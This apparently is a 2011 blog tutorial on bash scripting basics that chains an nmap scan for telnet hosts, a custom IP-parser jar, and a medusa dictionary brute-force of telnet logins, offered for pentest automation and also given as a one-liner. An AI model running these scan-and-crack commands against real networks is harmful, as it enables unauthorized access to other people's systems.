Exploit-DB updates

Loading...

Saturday, May 7, 2011

Bash Scripting Basics

Well seeing as I've recently posted my bash friendly java IP parser for use with other tools, I figured I would make a post detailing the basics of bash scripting and one possible way the parser might be used. To start off, open your text editor of choice, mine is nano. Now we will start by creating a file called "b a.sh" and specifying which shell we'd like this script to use by adding "#!/bin/bash" to the top of our script. 

#!/bin/bash

The reason we add this is because we are telling the script to use the "bash" located in the "/bin" directory. 

Moving on to adding something useful. We can use a shell command like so;

#!/bin/bash
echo "Scanning the local network!"
nmap 10.0.0.1/24 -PN -sV -p 23

Now that we have a script that does something we can save it (ctrl-o in nano) and make it executable with the chmod command, then run it.

chmod 755 ba.sh
/ba.sh

Now this is nice and all, but not very useful seeing as we could just enter the command our self. We will string together an nmap scan with my log parser to extract ips from the log and write them in a list format.

#!/bin/bash
logfile="nlog" 
echo "Scanning the local network!"
nmap 10.0.0.1/24 -oG $logfile -PN -sV -p 23 --open
java -jar ips.jar $logfile
cat ips

Now this script is a bit more useful, it scans the local network for pcs with telnet running and writes it to an nmap log which we specify using a variable. That log is then parsed by my ip parser and the ips are written in a list format to a file named "ips" which we then use the "cat" command (which reads a file and displays it in the terminal) to make sure all's well and the script worked. 

If we were on a pentest and wanted to automate a process to scan the network and attempt to crack open telnets we could use a script like this;

#!/bin/bash
logfile="nlog" 
echo "Scanning the local network for hosts running telnet"
nmap 10.0.0.1/24 -oG $logfile -PN -sV -p 23 --open
java -jar ips.jar $logfile
medusa -H /root/ips -U /root/users -P /root/dictionary.txt -e ns -f -v 6 -O telcrack -M telnet

This script will essentially look for hosts running telnet and attempt to crack them with medusa. This is the very basics of bash scripting. There are so many other possibilities. I would also like to mention that when issuing commands in the terminal you can link them together using the ";". So this script could be issued in a shell like this;

clear;logfile="nlog" ;echo "Scanning the local network for hosts running telnet";nmap 10.0.0.1/24 -oG $logfile -PN -sV -p 23 --open;java -jar ips.jar $logfile;medusa -H /root/ips -U /root/users -P /root/dictionary.txt -e ns -f -v 6 -O telcrack -M telnet

Note: You WILL need root to issue that command.


Well that's the basics and shows you how the ip parser could be used to combine tools, I'll likely make more posts on bash scripting in the future so stay tuned. You can find the ip parser here








Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)